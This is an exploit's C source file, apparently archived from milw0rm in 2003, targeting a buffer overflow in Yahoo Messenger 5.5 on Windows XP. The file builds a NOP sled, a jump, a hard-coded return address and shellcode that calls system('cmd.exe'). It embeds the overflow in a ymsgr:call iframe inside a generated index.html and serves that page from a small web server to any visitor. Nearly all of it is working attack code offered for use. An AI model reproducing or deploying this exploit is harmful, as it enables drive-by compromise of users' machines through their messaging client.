261 lines
No EOL
6.4 KiB
C
261 lines
No EOL
6.4 KiB
C
/*
|
|
*
|
|
* ---[ Remote yahoo Messenger V5.5 exploiter on Windows XP ]---
|
|
*
|
|
* Dtors Security Research (DSR)
|
|
* Code by: Rave
|
|
*
|
|
* The buffer looks like this
|
|
*
|
|
* |-<-<-<--|
|
|
* <Fillup x offset><JMP 0x3><EIP><NOPS><SHELLCODE>
|
|
* ^__________^
|
|
*
|
|
*
|
|
*/
|
|
|
|
|
|
#include <windows.h>
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <string.h>
|
|
#include <stdio.h> /* These are the usual header files */
|
|
#include <winsock2.h>
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#define MAXDATASIZE 555 /* Max number of bytes of data */
|
|
#define BACKLOG 200 /* Number of allowed connections */
|
|
|
|
static int port =80;
|
|
|
|
/* library entry inside msvcrt.dll to jmp 0xc (EB0C); */
|
|
char sraddress[8]="\x16\xd8\xE8\x77";
|
|
|
|
/* This shellcode just executes cmd.exe nothing special here..
|
|
* the victim gets a cmd shell on his desktop :) lol ! \
|
|
*/
|
|
|
|
unsigned char shellcode[] =
|
|
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
|
|
"\x8b\xec\x55\x8b\xec\x68\x65\x78\x65\x20\x68\x63\x6d\x64\x2e\x8d\x45\xf8\x50\xb8"
|
|
|
|
"\x44\x80\xbf\x77" // 0x78bf8044 <- adress of system()
|
|
"\xff\xd0"; // call system()
|
|
|
|
|
|
|
|
static int port;
|
|
void Usage(char *programName)
|
|
{
|
|
printf("\n\t\t---------------------------------------------------\n");
|
|
printf("\t\t\t\tDtors Security Research (DSR) \n");
|
|
printf("\t\t\t\tCode by: Rave\n");
|
|
printf("\t\t\t\tMail: rave@dtors.net\n");
|
|
printf("\t\t---------------------------------------------------\n\n");
|
|
|
|
|
|
/* Modify here to add your usage message when the program is
|
|
* called without arguments */
|
|
printf("\t\t---------------------------------------------------\n\n");
|
|
fprintf(stdout,"\t\t-P local webserver server portnumber\n");
|
|
fprintf(stdout,"\t\t-g greatz to:\n\n\n\n\n");
|
|
printf("\t\t---------------------------------------------------\n\n");
|
|
|
|
}
|
|
|
|
/* returns the index of the first argument that is not an option; i.e.
|
|
does not start with a dash or a slash
|
|
*/
|
|
int HandleOptions(int argc,char *argv[])
|
|
{
|
|
int i,firstnonoption=0;
|
|
|
|
for (i=1; i< argc;i++) {
|
|
if (argv[i][0] == '/' || argv[i][0] == '-') {
|
|
switch (argv[i][1]) {
|
|
/* An argument -? means help is requested */
|
|
case '?':
|
|
Usage(argv[0]);
|
|
break;
|
|
case 'P':
|
|
port=atoi(argv[i+1]);break;
|
|
case 'H':
|
|
if (!stricmp(argv[i]+1,"help")) {
|
|
Usage(argv[0]);
|
|
break;
|
|
}
|
|
/* If the option -h means anything else
|
|
* in your application add code here
|
|
* Note: this falls through to the default
|
|
* to print an "unknow option" message
|
|
*/
|
|
/* add your option switches here */
|
|
default:
|
|
fprintf(stderr,"unknown option %s\n",argv[i]);
|
|
break;
|
|
}
|
|
}
|
|
else {
|
|
firstnonoption = i;
|
|
break;
|
|
}
|
|
}
|
|
return firstnonoption;
|
|
}
|
|
|
|
int main(int argc,char *argv[])
|
|
{
|
|
FILE *fptr;
|
|
unsigned char buffer[5000];
|
|
int offset=320; // <-- the offset off the buffer = 320 x NOP; (At 321 whe begin the instruction pointer change)
|
|
int fd,fd2 ,i,numbytes,sin_size; /* files descriptors */
|
|
|
|
char sd[MAXDATASIZE]; /* sd will store send text */
|
|
|
|
struct sockaddr_in server; /* server's address information */
|
|
struct sockaddr_in client; /* client's address information */
|
|
struct hostent *he; /* pointer for the host entry */
|
|
|
|
|
|
WSADATA wsdata;
|
|
WSAStartup(0x0101,&wsdata);
|
|
|
|
|
|
if (argc == 1) {
|
|
/* If no arguments we call the Usage routine and exit */
|
|
Usage(argv[0]);
|
|
return 1;
|
|
}
|
|
|
|
HandleOptions(argc,argv);
|
|
fprintf(stdout,"Creating index.html: ");
|
|
if ((fptr =fopen("index.html","w"))==NULL){
|
|
fprintf(stderr,"Failed\n");
|
|
exit(1);
|
|
} else {
|
|
fprintf(stderr,"Done\n");
|
|
}
|
|
|
|
// memseting the buffers for preperation
|
|
memset(sd,0x00,MAXDATASIZE);
|
|
memset(buffer,0x00,offset+32+strlen(shellcode));
|
|
memset(buffer,0x90,offset);
|
|
|
|
|
|
// whe place the a jmp ebp+0x3 instuction inside the buffer
|
|
// to jump over the eip changing bytes at the en offset
|
|
//
|
|
// <fillup x offset>jmp 0x3<eip><NOPS><shellcode>
|
|
// |____________^
|
|
buffer[offset-4]=0xeb;
|
|
buffer[offset-3]=0x03;
|
|
|
|
memcpy(buffer+offset,sraddress,4);
|
|
memcpy(buffer+offset+4,shellcode,strlen(shellcode));
|
|
|
|
|
|
// here whe make the index.html
|
|
// whe open it again if some one connects to the exploiting server
|
|
// and send it over to the victim.
|
|
|
|
fprintf(fptr,"<!DOCTYPE HTML PUBLIC %c-//W3C//DTD HTML 4.0 Transitional//EN%c>",0x22,0x22);
|
|
fprintf(fptr,"<html>");
|
|
fprintf(fptr,"<title>Oohhh my god exploited</title>\n");
|
|
fprintf(fptr,"<body bgcolor=%cblack%c>",0x22,0x22);
|
|
fprintf(fptr,"<body>");
|
|
fprintf(fptr,"<font color=%c#C0C0C0%c size=%c2%c face=%cverdana, arial, helvetica, sans-serif%c>",
|
|
0x22,0x22,0x22,0x22,0x22,0x22);
|
|
fprintf(fptr,"<B>Dtors Security Research (DSR)</B>\n");
|
|
fprintf(fptr,"<p>Yah000 Messager Version 5.5 exploit....</p>\n");
|
|
fprintf(fptr,"<pre>");
|
|
fprintf(fptr,"<IFRAME SRC=%cymsgr:call?%s%c>Contach heaven</html></body>\x00\x00\x00",0x22,buffer,0x22);
|
|
fprintf(fptr,"<IFRAME SRC=%chttp://www.boothill-mc.com/images/skull-modsm_01.gif%c>....</html>
|
|
</body>\x00\x00\x00",0x22,0x22);
|
|
|
|
fclose(fptr); // <-- closing index.html again
|
|
|
|
|
|
// Some extra debuging information
|
|
fprintf(stdout,"Using port: %d\n",port);
|
|
fprintf(stdout,"\nStarting server http://localhost:%d: ",port);
|
|
|
|
if ((fd=socket(AF_INET, SOCK_STREAM, 0)) == -1 ){ /* calls socket() */
|
|
printf("socket() error\n");
|
|
exit(1);} else {
|
|
fprintf(stderr,"Done\n");
|
|
}
|
|
|
|
|
|
server.sin_family = AF_INET;
|
|
server.sin_port = htons(port);
|
|
server.sin_addr.s_addr = INADDR_ANY; /* INADDR_ANY puts your IP address automatically */
|
|
memset(server.sin_zero,0,8); /* zero the rest of the structure*/
|
|
|
|
|
|
if(bind(fd,(struct sockaddr*)&server,sizeof(struct sockaddr))==-1){
|
|
/* calls bind() */
|
|
printf("bind() error\n");
|
|
exit(-1);
|
|
}
|
|
|
|
if(listen(fd,BACKLOG) == -1){ /* calls listen() */
|
|
printf("listen() error\n");
|
|
exit(-1);
|
|
}
|
|
|
|
while(1){
|
|
sin_size=sizeof(struct sockaddr_in);
|
|
if ((fd2 = accept(fd,(struct sockaddr *)&client,&sin_size))==-1){
|
|
/* calls accept() */
|
|
printf("accept() error\n");
|
|
exit(1);
|
|
}
|
|
|
|
if ((he=gethostbyname(inet_ntoa(client.sin_addr)))==NULL){
|
|
printf("gethostbyname() error\n");
|
|
exit(-1);
|
|
}
|
|
|
|
printf("You got a connection from %s (%s)\n",
|
|
inet_ntoa(client.sin_addr),he->h_name);
|
|
/* prints client's IP */
|
|
|
|
|
|
fprintf(stdout,"\nOpening index.html for remote user: ");
|
|
if ((fptr =fopen("index.html","r"))==NULL){
|
|
fprintf(stderr,"Failed\n");
|
|
exit(1);
|
|
} else {
|
|
fprintf(stderr,"Done\n");
|
|
}
|
|
|
|
fprintf(stdout,"Sending the overflow string... ");
|
|
|
|
|
|
// reading the index.html file and sending its
|
|
// contents to the connected victim
|
|
|
|
while (!feof(fptr)) {
|
|
send(fd2,sd,strlen(sd),0);
|
|
numbytes=fread(sd,sizeof(char),MAXDATASIZE,fptr);
|
|
sd[numbytes * sizeof(char)]='\0';
|
|
|
|
|
|
}
|
|
|
|
|
|
send(fd2,sd,strlen(sd),0);
|
|
|
|
|
|
printf("\n\n\nExploit Done....\n\n\n");
|
|
printf("A shell is started @ %s :) lol\n\n\nPress any key to exit the exploit",inet_ntoa(client.sin_addr),he->h_name);
|
|
|
|
gets(sd);
|
|
exit(0);
|
|
}
|
|
|
|
return 0;
|
|
}
|
|
|
|
|
|
// milw0rm.com [2003-06-23]
|